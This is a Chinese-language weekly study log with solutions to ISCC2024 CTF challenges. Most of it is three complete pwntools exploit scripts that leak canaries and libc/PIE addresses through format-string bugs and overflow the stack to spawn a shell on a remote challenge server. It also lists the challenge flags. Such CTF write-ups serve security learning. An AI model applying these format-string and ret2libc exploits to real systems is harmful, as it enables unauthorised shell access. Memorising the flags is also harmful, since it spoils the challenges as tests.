24-05-06

本周学习总结

ISCC，我阐述你的梦。

全局常量声明：文章内容仅是由教程观点和自己总结获得，仅供参考。

一、[ISCC2024]–chaos

看，别问。

flag：ISCC{M6u7oMuvYXbuBlFIjBcHwSmx8jmU2LBrJPCt}

二、[ISCC2024]–ISCC_easy

check:

32位程序，NX保护开启。

漏洞为字符串格式漏洞和栈溢出漏洞。

exp:

from pwn import *

def stre(a):
    return str(a).encode()

def ph(a, b="addr"):
    print(b + ":" + hex(a))

def re(a):
    return p.recv(a)

def pre(a):
    print(p.recv(a))

def reu(a, b=False):
    return p.recvuntil(a, drop=b)

def rel():
    return p.recvline()

def se(a):
    p.send(a)

def sea(a, b):
    p.sendafter(a, b)

def sel(a):
    p.sendline(a)

def sela(a, b):
    p.sendlineafter(a, b)

def op():
    p.interactive()

def cp():
    p.close()

def raddr64():
    return u64(p.recv(6).ljust(8, b'\x00'))

def raddr32():
    return u32(p.recv(4))

def raddr_T():
    return int(re(14), 16)

def gdbp(p, a=''):
    if a != '':
        gdb.attach(p, a)
        pause()
    else:
        gdb.attach(p)
        pause()

def gdbm(name, b=''):
    if b != '':
        gdb.attach(target=("127.0.0.1", 99999), exe=name, gdbscript=b)
    else:
        gdb.attach(target=("127.0.0.1", 99999), exe=name)

def gret(elf):
    rop = ROP(elf)
    rop_ret = rop.find_gadget(["ret"]).address
    return rop_ret

# 远程连接
p = remote("182.92.237.102", 10013)

# 本地调试选项（已注释）
# p = process("./pw")
# p = process(["qemu-mipsel", "-g", "99999", "./pwn"])
# p = process(["qemu-mipsel", "./pwn"])
# elf = ELF("./pwn")
libc = ELF("./libc.so.6")

# context.log_level = 'debug'
# context.arch = 'amd64'
# context.os = 'linux'

# 漏洞利用流程
sea(b"fun!\n", p32(0x804C030) + b"A%4$hn")

main_addr = 0x80492E8
payload = b"A" * 0x94 + p32(main_addr)
sea(b"Input:\n", payload)
sea(b"fun!\n", b"%27$p-")

libc_base = int(reu(b"-", True), 16) - 245 - libc.sym["__libc_start_main"]
ph(libc_base, "libc_base")

sys_addr = libc_base + libc.sym["system"]
bin_addr = libc_base + next(libc.search(b"/bin/sh\x00"))

payload = b"A" * 0x94 + p32(sys_addr) + p32(0) + p32(bin_addr)
sea(b"Input:\n", payload)
op()

flag:ISCC{IsCu4w4AdYDWZnVyGGRPAdz8wDfxC5PUhYos}

三、[ISCC2024]–Flag

Check:

32位程序，canary和NX开启。

漏洞为字符串格式化漏洞和栈溢出漏洞。

难点在于libc版本。

通过字符串格式化泄漏获得help.txt的部分内容、libc_base和canary。

通过栈溢出getshell。

exp:

from pwn import *

def stre(a):
    return str(a).encode()

def ph(a, b="addr"):
    print(b + ":" + hex(a))

def re(a):
    return p.recv(a)

def pre(a):
    print(p.recv(a))

def reu(a, b=False):
    return p.recvuntil(a, drop=b)

def rel():
    return p.recvline()

def se(a):
    p.send(a)

def sea(a, b):
    p.sendafter(a, b)

def sel(a):
    p.sendline(a)

def sela(a, b):
    p.sendlineafter(a, b)

def op():
    p.interactive()

def cp():
    p.close()

def raddr64():
    return u64(p.recv(6).ljust(8, b'\x00'))

def raddr32():
    return u32(p.recv(4))

def raddr_T():
    return int(re(14), 16)

def gdbp(p, a=''):
    if a != '':
        gdb.attach(p, a)
        pause()
    else:
        gdb.attach(p)
        pause()

def gdbm(name, b=''):
    if b != '':
        gdb.attach(target=("127.0.0.1", 99999), exe=name, gdbscript=b)
    else:
        gdb.attach(target=("127.0.0.1", 99999), exe=name)

def gret(elf):
    rop = ROP(elf)
    rop_ret = rop.find_gadget(["ret"]).address
    return rop_ret

# 远程连接
p = remote("182.92.237.102", 10012)

# 本地调试选项（已注释）
# p = process("./pwn")
# p = process(["qemu-mipsel", "-g", "99999", "./pwn"])
# p = process(["qemu-mipsel", "./pwn"])
# elf = ELF("./pwn")
libc = ELF("./libc.so.6")

# 调试与架构设置
# context.log_level = 'debug'
context.arch = 'i386'
context.os = 'linux'

# 漏洞利用流程
sela(b"content?\n", b"%19$p-%27$p-")
reu(b"Your answered:\n")

canary = int(reu(b"-", True), 16)
ph(canary, "canary")

libc_base = int(reu(b"-", True), 16) - 245 - libc.sym["__libc_start_main"]
ph(libc_base, "libc_base")

bin_addr = libc_base + next(libc.search(b"/bin/sh\x00"))
sys_addr = libc_base + libc.sym["system"]

payload = b"A" * 0x88 + p32(canary) + p32(0) * 3 + p32(sys_addr) + p32(0) + p32(bin_addr)
sea(b"Input:\n", payload)
op()

flag:ISCC{2zUu5zjYop23TI6koriaAzvlnGfzcI70Zrbf}

四、[ISCC2024]–easyshell

Check:

64位程序，保护全开。

字符串格式化漏洞，栈溢出，程序自带后门，通过字符串格式化漏洞爆出pie和canary，栈溢出劫持程序流到后门函数中。

exp:

from pwn import *

def stre(a):
    return str(a).encode()

def ph(a, b="addr"):
    print(b + ":" + hex(a))

def re(a):
    return p.recv(a)

def pre(a):
    print(p.recv(a))

def reu(a, b=False):
    return p.recvuntil(a, drop=b)

def rel():
    return p.recvline()

def se(a):
    p.send(a)

def sea(a, b):
    p.sendafter(a, b)

def sel(a):
    p.sendline(a)

def sela(a, b):
    p.sendlineafter(a, b)

def op():
    p.interactive()

def cp():
    p.close()

def raddr64():
    return u64(p.recv(6).ljust(8, b'\x00'))

def raddr32():
    return u32(p.recv(4))

def raddr_T():
    return int(re(14), 16)

def gdbp(p, a=''):
    if a != '':
        gdb.attach(p, a)
        pause()
    else:
        gdb.attach(p)
        pause()

def gdbm(name, b=''):
    if b != '':
        gdb.attach(target=("127.0.0.1", 99999), exe=name, gdbscript=b)
    else:
        gdb.attach(target=("127.0.0.1", 99999), exe=name)

def gret(elf):
    rop = ROP(elf)
    rop_ret = rop.find_gadget(["ret"]).address
    return rop_ret

# ==================== 程序连接配置 ====================

p = remote("182.92.237.102", 10011)
# p = process("./002")
# p = process(["qemu-mipsel", "-g", "99999", "./pwn"])
# p = process(["qemu-mipsel", "./pwn"])

# ==================== ELF 和上下文配置 ====================

# elf = ELF("./pwn")
libc = ELF("./libc.so.6")

# context.log_level = 'debug'
# context.arch = 'amd64'
# context.os = 'linux'
# elf.arch, elf.so

# ==================== 漏洞利用 ====================

# 泄露 canary 和 PIE 基址
sela(b">>", b"flagis %15$p-%17$p-")
canary = int(reu(b"-", True), 16)
pie = int(reu(b"-", True), 16) - 0x1520

ph(canary, "canary")
ph(pie, "pie")

# 栈溢出：覆盖返回地址
sela(b">>", b"A" * 0x38 + p64(canary) + b"A" * 0x8 + p64(pie + 0x1291))

# 退出触发返回
sela(b">>", b"exit")

# 进入交互模式
op()

flag：ISCC{Ugoa6UepMLs94APuoGLvra5iWymJhMlLFoHN}

下周学习计划

| 应该要做的事情 |

学习感受

pycc